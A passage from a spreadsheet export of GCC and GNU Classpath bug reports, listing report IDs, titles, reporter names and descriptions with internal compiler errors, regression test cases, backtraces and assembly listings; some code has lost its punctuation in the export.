In file included from ../../gcc-3.0-20010611/gcc/unwind-sjlj.c:270:
../../gcc-3.0-20010611/gcc/unwind.inc: In function `_Unwind_RaiseException_Phase
2':
:                                                         
../../gcc-3.0-20010611/gcc/unwind.inc:67: warning: implicit declaration of funct
ion `abort'
../../gcc-3.0-20010611/gcc/unwind.inc:57: Internal compiler error in expand_call
 at calls.c:3076
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
gcc-3.0-20010611
Environment:
RedHat GNU/Linux 6.2
How-To-Repeat:
configure and make with this command:
+ ../gcc-3.0-20010611/configure --target=h8300-coff --with-gnu-as --with-gnu-ld
--with-newlib --verbose --prefix=/usr1/tmp-tools      
I used binutils 2.10.</t>
  </si>
  <si>
    <t>GCC-22497</t>
  </si>
  <si>
    <t>A register is wasted in simple vectorised loops</t>
  </si>
  <si>
    <t>Hello!
Consider this simple testcase:
#define N 16
short ia[N]
short ic[N] = {0369121518212427303336394245}
short ib[N] = {0369121518212427303336394245}
int main ()
{
  int i
  for (i = 0 i &lt; N i++)
    ia[i] = ib[i] + ic[i]
  return 0
}
The loop in this testcase is compiled with 'gcc -O2 -ftree-vectorize -msse2' 
into:
.L2:
	movdqa	ib(%eax) %xmm0
	paddw	ic(%eax) %xmm0
	incl	%edx
	movdqa	%xmm0 ia(%eax)
	addl	$16 %eax
	cmpl	$2 %edx
	jne	.L2
There is no (%reg16) SIB mode available in i386 and it looks to me that loop 
optimizer fallbacks to the most simple addressing mode in this case. 
Unfortunatelly %edx register is wasted in above code.
A better code would be:
.L2:
	movdqa	ib(%eax8) %xmm0
	paddw	ic(%eax8) %xmm0
	movdqa	%xmm0 ia(%eax8)
	addl	$2 %eax
	cmpl	$4 %eax
	jne	.L2
or with the simplest addressing scheme:
.L2:
	movdqa	ib(%eax) %xmm0
	paddw	ic(%eax) %xmm0
	movdqa	%xmm0 ia(%eax)
	addl	$16 %eax
	cmpl	$32 %eax
	jne	.L2
Uros.</t>
  </si>
  <si>
    <t>GCC-12380</t>
  </si>
  <si>
    <t>[3.4 Regression] ICE when  profile feedback enabled for PowerPC (AIX Darwin Linux)</t>
  </si>
  <si>
    <t>SPEC CPU2000 197.parser
gcc -c -o main.o -D_POSIX_SOURCE -fbranch-probabilities -freorder-blocks-and-
partition -O3 -funroll-loops -ffast-math -mcpu=power4 main.c
main.c: In function `loop':
main.c:1502: error: corrupted profile info: number of iterations for basic 
block 1 thought to be -6513761
main.c:1502: error: corrupted profile info: number of executions for edge 39-40 
thought to be 6513761
main.c:1502: error: corrupted profile info: number of executions for edge 39-1 
thought to be 6513761
specmake: *** [main.o] Error 1
With -fnew-ra added gcc ICEs with -fprofile-arcs:
gcc -c -o main.o -D_POSIX_SOURCE -fprofile-arcs -O3 -funroll-loops -ffast-math -
mcpu=power4 -fnew-ra prune.c
prune.c: In function `possible_connection':
prune.c:1174: error: Abnormal edges for no purpose in bb 28
prune.c:1174: internal compiler error: verify_flow_info failed</t>
  </si>
  <si>
    <t>jh</t>
  </si>
  <si>
    <t>GCC-64503</t>
  </si>
  <si>
    <t>[5 Regression] gcc.dg/ipa/iinline-4.c:210:1: internal compiler error: Floating point exception</t>
  </si>
  <si>
    <t>Recently compiler starts to crash with the Floating point exception on several IPA related testcases where -fdump-ipa-inline is used. One example is:
/space/uros/gcc-build/gcc/xgcc -B/space/uros/gcc-build/gcc/ /space/homedirs/uros/gcc-svn/trunk/gcc/testsuite/gcc.dg/ipa/iinline-4.c -fno-diagnostics-show-caret -fdiagnostics-color=never -O3 -fdump-ipa-inline -fno-early-inlining -fno-ipa-icf -S  -o iinline-4.s
/space/homedirs/uros/gcc-svn/trunk/gcc/testsuite/gcc.dg/ipa/iinline-4.c:210:1: internal compiler error: Floating point exception
0x1207c7743 crash_signal
        ../../gcc-svn/trunk/gcc/toplev.c:359
0x1207abf0c sreal::to_double() const
        ../../gcc-svn/trunk/gcc/sreal.c:125
0x120c92be7 inline_small_functions
        ../../gcc-svn/trunk/gcc/ipa-inline.c:1723
0x120c92be7 ipa_inline
        ../../gcc-svn/trunk/gcc/ipa-inline.c:2185
0x120c92be7 execute
        ../../gcc-svn/trunk/gcc/ipa-inline.c:2558
Please submit a full bug report
...
This problem can also bw seen on x86_64-linux-gnu with the above testcase. In the iinline-4.c.055i.inline dump file badness is estimated to -inf:
...
Considering hiphip4.constprop/36 with 6 size
 to be inlined into test4/14 in unknown:-1
 Estimated badness is -inf frequency 1.00.
 Inlined into test4 which now has time 16 and size 8net change of -8.
New minimal size reached: 160
(and several other occurrences)
...
Please note that x86_64 is immune to infinities by default where alpha needs special FP instructions to handle overflow traps. While this can be done (build the compiler with -mieee) it looks that something went wrong with the badness estimation.</t>
  </si>
  <si>
    <t>CLASSPATH-22820</t>
  </si>
  <si>
    <t>javax.swing.plaf.basic.BasicButtonListener missing constructor</t>
  </si>
  <si>
    <t xml:space="preserve">BasicButtonListener(AbstractButton b) is missing. According to the javadoc.
http://java.sun.com/j2se/1.4.2/docs/api/javax/swing/plaf/basic/BasicButtonListener.html
Can you please add it. Am unable to build Apache Axis because of this.
thanks
dims
</t>
  </si>
  <si>
    <t>GCC-21407</t>
  </si>
  <si>
    <t>[4.1 Regression] wrong code with downcast in C++</t>
  </si>
  <si>
    <t>The is huge bug which effects a large amount of C++ we should not abort.
extern C void abort(void)
struct T1 {int a b virtual void f(){}}
struct T : T1 { struct T1 w  int b }
void foo (struct T1 *p) { struct T *q = dynamic_cast(p) if (q-&gt;b != 2) abort () }
int main () { struct T c c.b = 2 foo ( return 0 }</t>
  </si>
  <si>
    <t>GCC-38725</t>
  </si>
  <si>
    <t>[4.4 regression] ICE with goto</t>
  </si>
  <si>
    <t>The following code snippet triggers an ICE on the trunk:
=====================
void foo(int i)
{
  goto *i
}
=====================
bug.cc: In function 'void foo(int)':
bug.cc:1: error: goto destination is neither a label nor a pointer
goto i
bug.cc:1: internal compiler error: verify_gimple failed
Please submit a full bug report [etc.]
The error message comes from verify_gimple_goto so this is not an
error-recovey bug but a crash in the middle-end.
I'm not quite sure whether the code is valid or not i.e. whether 'i'
should be converted into a pointer automatically or not.
The C frontend accepts the code. The C++ frontend accepted the code up
to and including 4.3.x.
A more complex (and definitely invalid) testcase crashes in a different
position (since at least GCC 2.95.3):
==========================
struct A {}
struct B : virtual A {}
void foo(B b)
{
  goto *b
}
==========================
bug.cc: In function 'void foo(B)':
bug.cc:7: internal compiler error: in create_tmp_var at gimplify.c:555
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-21123</t>
  </si>
  <si>
    <t>[4.0/4.1 regression] ICE in cp_expr_size at cp/cp-objcp-common.c:101</t>
  </si>
  <si>
    <t>this code is from the package arts preprocessed and reduced. The bug may be 
reproduced with  
# g++ -c mcop.ii  
mcop.ii: In member function 'std::vector&lt;std::string 
std::allocator &gt; 
Arts::InterfaceRepo_base::_ZTv0_n12_NK4Arts18InterfaceRepo_base15_defaultPortsInEv() 
const': 
mcop.ii:134: internal compiler error: in cp_expr_size at 
cp/cp-objcp-common.c:101</t>
  </si>
  <si>
    <t>b.gunreben</t>
  </si>
  <si>
    <t>GCC-60841</t>
  </si>
  <si>
    <t>[4.9 Regression] gcc: internal compiler error: Killed (program cc1) out of memory</t>
  </si>
  <si>
    <t>Created attachment 32596
preprocessed source file that demonstrates the problem
When compiling with gcc -Ofast the compiler runs for a long time and eventually dies with following internal compiler error.
When compiling with gcc -O3 the compilation succeeds and is also much quicker.
gcc: internal compiler error: Killed (program cc1)
0x409fd4 execute
	/root/source/gcc-4.9.0-RC-20140411/gcc/gcc.c:2848
0x40a384 do_spec_1
	/root/source/gcc-4.9.0-RC-20140411/gcc/gcc.c:4652
0x40cc46 process_brace_body
	/root/source/gcc-4.9.0-RC-20140411/gcc/gcc.c:5935
0x40cc46 handle_braces
	/root/source/gcc-4.9.0-RC-20140411/gcc/gcc.c:5849
0x40b1f9 do_spec_1
	/root/source/gcc-4.9.0-RC-20140411/gcc/gcc.c:5306
0x40cc46 process_brace_body
	/root/source/gcc-4.9.0-RC-20140411/gcc/gcc.c:5935
0x40cc46 handle_braces
	/root/source/gcc-4.9.0-RC-20140411/gcc/gcc.c:5849
0x40b1f9 do_spec_1
	/root/source/gcc-4.9.0-RC-20140411/gcc/gcc.c:5306
0x40af63 do_spec_1
	/root/source/gcc-4.9.0-RC-20140411/gcc/gcc.c:5421
0x40cc46 process_brace_body
	/root/source/gcc-4.9.0-RC-20140411/gcc/gcc.c:5935
0x40cc46 handle_braces
	/root/source/gcc-4.9.0-RC-20140411/gcc/gcc.c:5849
0x40b1f9 do_spec_1
	/root/source/gcc-4.9.0-RC-20140411/gcc/gcc.c:5306
0x40cc46 process_brace_body
	/root/source/gcc-4.9.0-RC-20140411/gcc/gcc.c:5935
0x40cc46 handle_braces
	/root/source/gcc-4.9.0-RC-20140411/gcc/gcc.c:5849
0x40b1f9 do_spec_1
	/root/source/gcc-4.9.0-RC-20140411/gcc/gcc.c:5306
0x40cc46 process_brace_body
	/root/source/gcc-4.9.0-RC-20140411/gcc/gcc.c:5935
0x40cc46 handle_braces
	/root/source/gcc-4.9.0-RC-20140411/gcc/gcc.c:5849
0x40b1f9 do_spec_1
	/root/source/gcc-4.9.0-RC-20140411/gcc/gcc.c:5306
0x40cc46 process_brace_body
	/root/source/gcc-4.9.0-RC-20140411/gcc/gcc.c:5935
0x40cc46 handle_braces
	/root/source/gcc-4.9.0-RC-20140411/gcc/gcc.c:5849
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-65352</t>
  </si>
  <si>
    <t>array::begin()/end() etc. forms a null reference and breaks on clang+ubsan</t>
  </si>
  <si>
    <t>Repro:
#include 
int main(){
    std::array foo
    foo.begin() // or end() etc.
}
Output (http://coliru.stacked-crooked.com/a/e1cbe7e73bcee449):
&gt; clang++ --version
clang version 3.5.0 (tags/RELEASE_350/final 217394)
Target: x86_64-unknown-linux-gnu
Thread model: posix
&gt; clang++ -std=c++11 -O0 -Wall -pedantic -pthread main.cpp -fsanitize=undefined
&gt; ./a.out
==15356==WARNING: readlink(/proc/self/exe) failed with errno 2 some stack frames may not be symbolized
/usr/local/bin/../lib/gcc/x86_64-unknown-linux-gnu/4.9.2/../../../../include/c++/4.9.2/array:63:15: runtime error: reference binding to null pointer of type 'int'
/usr/local/bin/../lib/gcc/x86_64-unknown-linux-gnu/4.9.2/../../../../include/c++/4.9.2/array:222:33: runtime error: reference binding to null pointer of type 'int'
begin()/end() are supposed to be well-defined even if N = 0. The implementation in  defers to data() which in turn returns std::__addressof(_AT_Type::_S_ref(_M_elems 0)). The problem is that for the N = 0 case __array_traits::_S_ref forms and returns a null reference:
     static constexpr _Tp&amp;
     _S_ref(const _Type&amp; std::size_t) noexcept
     { return *static_cast(nullptr) }
An obvious possible fix is to provide a pointer-returning helper in addition to or instead of _S_ref.</t>
  </si>
  <si>
    <t>GCC-644</t>
  </si>
  <si>
    <t>internal compile error using templates</t>
  </si>
  <si>
    <t>When instatiating a template class with a private member function
gcc henerates an internal compiler error.  If the member is public
there is no compiler error.
Release:
gcc version 2.95.2 19991024 (release-2)
Environment:
/i686-pc-cygwin/2.95.2/specs
Cygwin
Used default options during installation.
How-To-Repeat:
gcc units.cpp -o u.exe</t>
  </si>
  <si>
    <t>rettigcd</t>
  </si>
  <si>
    <t>GCC-63921</t>
  </si>
  <si>
    <t>[F08] pointer function as lvalue doesn't work when the function is a type bound function</t>
  </si>
  <si>
    <t>Created attachment 34006
Source code useful to explain the bug
If I try to use a type bounded function as lvalue 
the compiler throw this error
!...COMPILER VERSION............................................................
Using built-in specs.
COLLECT_GCC=/opt/gcc/5.0/bin/gfortran
COLLECT_LTO_WRAPPER=/opt/gcc/5.0/libexec/gcc/x86_64-unknown-linux-gnu/4.9.2/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../src/configure --prefix /opt/gcc/5.0/
Thread model: posix
gcc version 4.9.2 (GCC) 
!...............................................................................
!...COMPILER OUTPUT.............................................................
lvalue.f90:110.2:
  STENCIL%JMP( 1 1 ) = 10.0d0 + STENCIL%JMP( 1 1 )
  1
Error: 'lvalue_jmp' in variable definition context (assignment) at (1) is not a variable
make: *** [test.x] Error 1
!...............................................................................
!...COMPILING COMMAND...........................................................
gfortran -save-temps lvalue.f90 -o test.x
!...............................................................................
If I want to modify the data pointed by the function I need to use a temporary variable.
!... BUG ......................................................................
  ...
  !...Running version with temporary pointer
  !real_tmp_ptr =&gt; STENCIL%JMP( 1 1 )
  !real_tmp_ptr = 10.0d0 + STENCIL%JMP( 1 1 )
  !...Not running version
  STENCIL%JMP( 1 1 ) = 10.0d0 + STENCIL%JMP( 1 1 )
  ...
!..............................................................................
Mirco</t>
  </si>
  <si>
    <t>mirco.valentini</t>
  </si>
  <si>
    <t>GCC-83146</t>
  </si>
  <si>
    <t>[6/7/8/9 Regression] ICE on SELECT CASE statement with associate name</t>
  </si>
  <si>
    <t>The current 8.0 trunk gives an ICE on the following example.  6.4.1 also gives an ICE.
type foo
  integer n
end type
type bar
  type(foo) array(2)
end type
type(bar) b
associate (n_array =&gt; b%array%n)
  select case (n_array(1))
  case default
  end select
end associate
end
Here's the traceback
$ gfortran -c gfortran-20171124.f90 
gfortran-20171124.f90:9:0:
   select case (n_array(1))
internal compiler error: in gfc_get_element_type at fortran/trans-types.c:1231
0x5a5da8 gfc_get_element_type(tree_node*)
	../../gcc/fortran/trans-types.c:1231
0x95d247 trans_associate_var
	../../gcc/fortran/trans-stmt.c:1632
0x95d247 gfc_trans_block_construct(gfc_code*)
	../../gcc/fortran/trans-stmt.c:1890
0x8e48c7 trans_code
	../../gcc/fortran/trans.c:1924
0x90e7a8 gfc_generate_function_code(gfc_namespace*)
	../../gcc/fortran/trans-decl.c:6437
0x89d036 translate_all_program_units
	../../gcc/fortran/parse.c:6091
0x89d036 gfc_parse_file()
	../../gcc/fortran/parse.c:6294
0x8e0eaf gfc_be_parse_file
	../../gcc/fortran/f95-lang.c:204</t>
  </si>
  <si>
    <t>neil.n.carlson</t>
  </si>
  <si>
    <t>GCC-36056</t>
  </si>
  <si>
    <t>g++.dg/ext/vector14.C doesn't work for ia32</t>
  </si>
  <si>
    <t>I got
Executing on host: /export/build/gnu/gcc-avx/build-x86_64-linux/gcc/testsuite/g++/../../g++ -B/export/build/gnu/gcc-avx/build-x86_64-linux/gcc/testsuite/g++/../../ /export/gnu/src/gcc-avx/gcc/gcc/testsuite/g++.dg/ext/vector14.C  -nostdinc++ -I/export/build/gnu/gcc-avx/build-x86_64-linux/x86_64-unknown-linux-gnu/32/libstdc++-v3/include/x86_64-unknown-linux-gnu -I/export/build/gnu/gcc-avx/build-x86_64-linux/x86_64-unknown-linux-gnu/32/libstdc++-v3/include -I/export/gnu/src/gcc-avx/gcc/libstdc++-v3/libsupc++ -I/export/gnu/src/gcc-avx/gcc/libstdc++-v3/include/backward -I/export/gnu/src/gcc-avx/gcc/libstdc++-v3/testsuite/util -fmessage-length=0   -ansi -pedantic-errors -Wno-long-long  -fno-show-column -S  -m32 -o vector14.s    (timeout = 300)
/export/gnu/src/gcc-avx/gcc/gcc/testsuite/g++.dg/ext/vector14.C: In function 'int __vector__ foo(float __vector__) [with int N = 1]':^M
/export/gnu/src/gcc-avx/gcc/gcc/testsuite/g++.dg/ext/vector14.C:6: warning: SSE vector argument without SSE enabled changes the ABI^M
output is:
/export/gnu/src/gcc-avx/gcc/gcc/testsuite/g++.dg/ext/vector14.C: In function 'int __vector__ foo(float __vector__) [with int N = 1]':^M
/export/gnu/src/gcc-avx/gcc/gcc/testsuite/g++.dg/ext/vector14.C:6: warning: SSE vector argument without SSE enabled changes the ABI^M
-msse2 may be needed for ia32.</t>
  </si>
  <si>
    <t>GCC-33800</t>
  </si>
  <si>
    <t>ICE-on-valid (segfault) on x86_64</t>
  </si>
  <si>
    <t>$  g++-4.3-20070907 -v
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-4.3-20070907/configure --program-suffix=-4.3-20070907 --enable-language=cc++ --prefix=/home/jack/opt --with-mpfr=/home/jack/opt
Thread model: posix
gcc version 4.3.0 20070907 (experimental) (GCC) 
$ g++-4.3-20070907 -fpic -O1 -c seed.i -o seed.o
src/seed.cpp: In member function â€˜virtual void Botan::SEED::enc(const Botan::byte* Botan::byte*) constâ€™:
src/seed.cpp:52: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
Results with other flags:
  -fpic: OK
  -fPIC: OK
  -O1: FAIL
  -O2: OK
  -O1 -fpic: FAIL
  -O1 -fPIC: FAIL
  -O2 -fpic: FAIL
  -O2 -fPIC: FAIL</t>
  </si>
  <si>
    <t>GCC-79393</t>
  </si>
  <si>
    <t>[7/8/9 Regression] cc1plus rejects valid code with noexcept</t>
  </si>
  <si>
    <t>We used to compile this just fine:
class C {
public:
  virtual ~C() noexcept(false)
}
class A : virtual C {
  virtual C m_fn1() = 0
}
class B : A {}
but since r240874 I'm getting
s.cc:8:7: error: looser throw specifier for â€˜virtual B::~B() noexcept (false)â€™
 class B : A {}
       ^
s.cc:5:7: error:   overriding â€˜virtual A::~A() noexceptâ€™
 class A : virtual C {
       ^</t>
  </si>
  <si>
    <t>GCC-44844</t>
  </si>
  <si>
    <t>Wrong _rdrand_uXX intrinsic implementation</t>
  </si>
  <si>
    <t>RDRAND instruction spec says:
Loads a hardware generated random value and store it in the destination
register. The size of the random value is determined by the destination
register size and operating mode. The Carry Flag indicates whether a random
value is available at the time the instruction is executed. CF=1 indicates
that the data in the destination is valid. Otherwise CF=0 and the data in
the destination operand will be returned as zeros for the specified width.
All other flags are forced to 0 in either situation. Software must check
the state of CF=1 for determining if a valid random value has been returned
otherwise it is expected to loop and retry execution of RDRAND.
Gcc implemented:
[hjl@gnu-6 rdrand-1]$ cat rdrand-2.c
/* { dg-do compile } */
/* { dg-options -O2 -mrdrnd  } */
/* { dg-final { scan-assembler rdrand\[ \t]+(%|)eax } } */
#include 
unsigned int
read_rdrand32 (void)
{
  return _rdrand_u32 ()
}
[hjl@gnu-6 rdrand-1]$ cat rdrand-2.s
	.file	rdrand-2.c
	.text
	.p2align 415
.globl read_rdrand32
	.type	read_rdrand32 @function
read_rdrand32:
.LFB564:
	.cfi_startproc
	rdrand %eax
	ret
	.cfi_endproc
.LFE564:
	.size	read_rdrand32 .-read_rdrand32
	.ident	GCC: (GNU) 4.6.0 20100705 (experimental)
	.section	.note.GNU-stack@progbits
[hjl@gnu-6 rdrand-1]$ 
There is no loop to check CF=1.</t>
  </si>
  <si>
    <t>GCC-16438</t>
  </si>
  <si>
    <t xml:space="preserve">template argument is required for </t>
  </si>
  <si>
    <t>template 
struct X
{
    template 
    struct Y
}
template 
struct X::Y
{
    template 
    struct r
    {
        typedef Y other
    }
}
int main(void)
{
    X::Y::r x
}
Note that the definition of Y has the wrong template nesting depth (according to
Comeau online) and that should be the diagnostic given (rather than the
misleading diagnostic given for r).  This is the correct definition of Y:
template 
template 
struct X::Y
{
    template 
    struct r
    {
        typedef Y other
    }
}</t>
  </si>
  <si>
    <t>dheld</t>
  </si>
  <si>
    <t>GCC-6738</t>
  </si>
  <si>
    <t>-dM -M -o file.i doesn't work (test gcc.dg/cpp/cmdlne-dM-M.c)</t>
  </si>
  <si>
    <t>Test gcc.dg/cpp/cmdlne-dM-M.c was added on 2002-05-02 and still fails.  
See http://gcc.gnu.org/ml/gcc-patches/2002-05/msg00100.html
Should this be xfailed?  I can prepare a patch.
Release:
gcc-3.2
Environment:
All (I think)</t>
  </si>
  <si>
    <t>GCC-64209</t>
  </si>
  <si>
    <t>[OOP] runtime segfault with CLASS(*) INTENT(OUT) dummy argument</t>
  </si>
  <si>
    <t>Created attachment 34209
Source code describing the bug
The attached source code produces segmentation fault :
Program received signal SIGSEGV: Segmentation fault - invalid memory reference.
Backtrace for this error:
#0  0x7FA69CC6F4D0
#1  0x7FA69CC6E6B0
#2  0x7FA69C17E54F
#3  0x4011FC in __copy_INTEGER_4_.3528 at gfort_bug.f90:?
#4  0x4010B0 in __m_MOD_copy
#5  0x401411 in MAIN__ at gfort_bug.f90:?
Segmentation fault
with 
gcc version 5.0.0 20141202 (experimental) [trunk revision 218267] (SUSE Linux).
The code works fine with ifort.</t>
  </si>
  <si>
    <t>polajnar.miha</t>
  </si>
  <si>
    <t>GCC-53003</t>
  </si>
  <si>
    <t>Internal compiler error on short testcase</t>
  </si>
  <si>
    <t>When a file containing only struct A{ void a{} return b is run it produces:
bad.cpp:1:18: internal compiler error: Segmentation fault
 struct A{ void a{} return b
                  ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
This is with SVN version 186473 on i686 GNU/Linux with no configure options.  No special command line options are required - this is triggered by g++ bad.cpp.  
The code snippet is obviously invalid C++.  The snippet was arrived at by taking a program that was valid C++ but also triggered internal compiler errors and reducing its size as much as possible without regard for validity.</t>
  </si>
  <si>
    <t>GCC-30494</t>
  </si>
  <si>
    <t>ICE with VLA and openmp</t>
  </si>
  <si>
    <t>Compiler output:
g++ -save-temps -Wall -g -fopenmp -Wno-deprecated -O4 -ffast-math -fexpensive-optimizations -DLINUX -I/home/latte/paraLattE/NTL/include  -I/usr/local/gcc4.2/lib/gcc/x86_64-unknown-linux-gnu/4.2.0/include -c BirkhoffCones.cpp
BirkhoffCones.cpp: In function â€˜int Birkhoff_with_Vol_para(int int int int int int)â€™:
BirkhoffCones.cpp:2462: internal compiler error: in gimplify_expr at gimplify.c:5979
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make: *** [BirkhoffCones.o] Error 1</t>
  </si>
  <si>
    <t>brandon.barker</t>
  </si>
  <si>
    <t>GCC-6661</t>
  </si>
  <si>
    <t>gcc can't bootstrap gcc with -O3</t>
  </si>
  <si>
    <t>gcc -c -march=athlon -g  -pipe  -O3 -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wtraditional -pedantic -Wno-long-long      -gnatpg -gnata -I- -I. -I../../../gcc/gcc/ada ../../../gcc/gcc/ada/tree_io.adb
+===========================GNAT BUG DETECTED==============================+
| 3.1 (20020212) (i686-pc-linux-gnu) GCC error:                            |
| RTL flag check: REG_POINTER used with unexpected rtx code `mem' in       |
|    copy_rtx_and_substitute at integrate.c:2063                          |
| Error detected at ../../../gcc/gcc/ada/tree_io.adb:612:23                |
I have try it without -march=athlon and/or a gcc build with default setup -- same problem when I tries to bootstrap with -O3 
Why is it saying 3.1 (20020212)?
The problem have be there for more that a week!
Release:
gcc (GCC) 3.2 20020514 (experimental)
Environment:
Linux 2.4.17-r5 Gentoo build AMD Athlon
How-To-Repeat:
build gcc from CVS (20020513)
../gcc/configure --enable-languages='cadac++f77javaobjc' --enable-threads=posix --enable-long-long --disable-nls 
(time make bootstrap) time make gnatlib_and_tools)
or
(time  make  CFLAGS='-march=athlon -pipe -O2' STAGE1_CFLAGS='-march=athlon -pipe -O2'  BOOT_CFLAGS='-march=athlon -pipe -O2' bootstrap ) time make CFLAGS='-march=athlon -pipe -O2' STAGE1_CFLAGS='-march=athlon -pipe -O2'  GNATLIBCFLAGS='-march=athlon -pipe -O2'  BOOT_CFLAGS='-march=athlon -pipe -O2' gnatlib_and_tools)
and rebuild it with -O3
../gcc/configure --enable-languages='cadac++f77javaobjc' --enable-threads=posix --enable-long-long --disable-nls --prefix=/home/lasj/Test1 
(time make  CFLAGS='-V -O3' STAGE1_CFLAGS='-O3'  BOOT_CFLAGS='-O3' bootstrap ) time make CFLAGS='-O3' STAGE1_CFLAGS='-O3'  GNATLIBCFLAGS='-O3'  BOOT_CFLAGS='-O3' gnatlib_and_tools)
or
(time make  CFLAGS='-march=athlon -g  -pipe -O3' STAGE1_CFLAGS='-march=athlon -g  -pipe  -O3'  BOOT_CFLAGS='-march=athlon -g  -pipe  -O3' bootstrap ) time make CFLAGS='-march=athlon -g  -pipe -O3' STAGE1_CFLAGS='-march=athlon  -g  -pipe -O3'  GNATLIBCFLAGS='-march=athlon  -pipe  -g -O3'  BOOT_CFLAGS='-march=athlon  -pipe  -g -O3' gnatlib_and_tools)</t>
  </si>
  <si>
    <t>larssj</t>
  </si>
  <si>
    <t>GCC-9595</t>
  </si>
  <si>
    <t>Minimal program fails to compile</t>
  </si>
  <si>
    <t>I was doing an autoconf. When I tried to run 'configure' the basic C program crashed. I reduced the program still further and it still failed.
This is a compiler that I use successfully quite a lot on real programs.
Release:
gcc-2.95.3
Environment:
Linux intel 2.4.5 kernel
How-To-Repeat:
C: source:
main ()
{
}
Command:
    gcc -c -v conftest.c 
Output:
Reading specs from /usr/lib/gcc-lib/i386-slackware-linux/2.95.3/specs
gcc version 2.95.3 20010315 (release)
 /usr/lib/gcc-lib/i386-slackware-linux/2.95.3/cpp0 -lang-c -v -D__GNUC__=2 -D__GNUC_MINOR__=95 -D__ELF__ -Dunix -D__i386__ -Dlinux -D__ELF__ -D__unix__ -D__i386__ -D__linux__ -D__unix -D__linux -Asystem(posix) -Acpu(i386) -Amachine(i386) -Di386 -D__i386 -D__i386__ conftest.c /tmp/cchGfRGu.i
GNU CPP version 2.95.3 20010315 (release) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 /usr/local/include
 /usr/lib/gcc-lib/i386-slackware-linux/2.95.3/include
 /usr/include
End of search list.
The following default directories have been omitted from the search path:
 /usr/lib/gcc-lib/i386-slackware-linux/2.95.3/../../../../include/g++-3
 /usr/lib/gcc-lib/i386-slackware-linux/2.95.3/../../../../i386-slackware-linux/include
End of omitted list.
 /usr/lib/gcc-lib/i386-slackware-linux/2.95.3/cc1 /tmp/cchGfRGu.i -quiet -dumpbase conftest.c -version -o /tmp/cc2W2pJR.s
GNU C version 2.95.3 20010315 (release) (i386-slackware-linux) compiled by GNU C version 2.95.3 20010315 (release).
gcc: Internal compiler error in `execute' at ../../gcc-2.95.3/gcc/gcc.c:2328
Please submit a full bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>raphael.mankin</t>
  </si>
  <si>
    <t>GCC-26894</t>
  </si>
  <si>
    <t>On a 64 bit system the generated crosscompiler generates invalid assembly</t>
  </si>
  <si>
    <t>Short synopsys:
---------------
You can not build a gcc for MCORE target on a 64-bit system. The bug is
identical for 4.0.2 and 4.1.0 versions of the gcc. The bug lies in the
actual MCORE crosscompiler if it runs on a 64 bit system it handles
long long constants incorrectly. Minimal code to reproduce the bug
is given.
Long outputs from commands have been broken into short lines.
System (uname -a):
------------------
  Linux linux 2.6.13-15-smp #1 SMP Tue Sep 13 14:56:15 
  UTC 2005 x86_64 x86_64 x86_64 GNU/Linux
Compiler (gcc -v):
------------------
  Target: x86_64-suse-linux
  Configured with: ../configure --enable-threads=posix --prefix=/usr 
  --with-local-prefix=/usr/local --infodir=/usr/share/info 
  --mandir=/usr/share/man --libdir=/usr/lib64 --libexecdir=/usr/lib64 
  --enable-languages=cc++objcf95javaada --disable-checking 
  --with-gxx-include-dir=/usr/include/c++/4.0.2 --enable-java-awt=gtk 
  --disable-libjava-multilib --with-slibdir=/lib64 --with-system-zlib 
  --enable-shared --enable-__cxa_atexit --without-system-libunwind 
  --host=x86_64-suse-linux
  Thread model: posix
  gcc version 4.0.2 20050901 (prerelease) (SUSE Linux)
The bug:
--------
Fresh download of gcc-4.1.0. Then:
~/GNU/gcc-mcore&gt; ../gcc-4.1.0/configure --target=mcore-elf --with-gnu-as 
                 --with-gnu-ld --enable-languages=c
Configure succeeds typing make successfully builds xgcc. 
It starts to build the libraries and it fails:
/home/zoltan/GNU/gcc-mcore/./gcc/xgcc -B/home/zoltan/GNU/gcc-mcore/./gcc/ 
   -B/usr/local/mcore-elf/bin/ -B/usr/local/mcore-elf/lib/ 
   -isystem /usr/local/mcore-elf/include 
   -isystem /usr/local/mcore-elf/sys-include -O2  -O2 -g -O2   
   -DIN_GCC -DCROSS_COMPILE  -DDONT_HAVE_STDIO -DDONT_HAVE_SETJMP  
   -Dinhibit_libc  -W -Wall -Wwrite-strings -Wstrict-prototypes 
   -Wmissing-prototypes -Wold-style-definition  -isystem ./include  
   -O3 -DNO_FLOATLIB_FIXUNSDFSI  -g  -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED 
   -Dinhibit_libc -I. -I. -I../../gcc-4.1.0/gcc -I../../gcc-4.1.0/gcc/. 
   -I../../gcc-4.1.0/gcc/../include -I../../gcc-4.1.0/gcc/../libcpp/include  
   -DL_floatdisf -c ../../gcc-4.1.0/gcc/libgcc2.c -o libgcc/./_floatdisf.o
/tmp/ccdhETch.s: Assembler messages:
/tmp/ccdhETch.s:38: Error: operand must be absolute in range 1..32 not 53
make[3]: *** [libgcc/./_floatdisf.o] Error 1
make[3]: Leaving directory `/home/zoltan/GNU/gcc-mcore/gcc'
make[2]: *** [stmp-multilib] Error 2
make[2]: Leaving directory `/home/zoltan/GNU/gcc-mcore/gcc'
make[1]: *** [all-gcc] Error 2
make[1]: Leaving directory `/home/zoltan/GNU/gcc-mcore'
make: *** [all] Error 2
Examining the assembler output that fails:
	.file	libgcc2.c
	.section .debug_abbrev
.Ldebug_abbrev0:
	.section .debug_info
.Ldebug_info0:
	.section .debug_line
.Ldebug_line0:
	.text
.Ltext0:
	.import	__floatsidf
	.import	__muldf3
	.import	__adddf3
	.import	__truncdfsf2
	.section .rodata.cst8
	.align	3
.LC0:
	.long	0
	.long	1106247680
	.text
	.align	1
	.export	__floatdisf
	.type	__floatdisf @function
__floatdisf:
.LFB2:
.LM1:
.LVL0:
	subi	sp32
	stw	r15(sp)
	stw	r13(sp4)
	stw	r12(sp8)
	stw	r11(sp12)
	stw	r10(sp16)
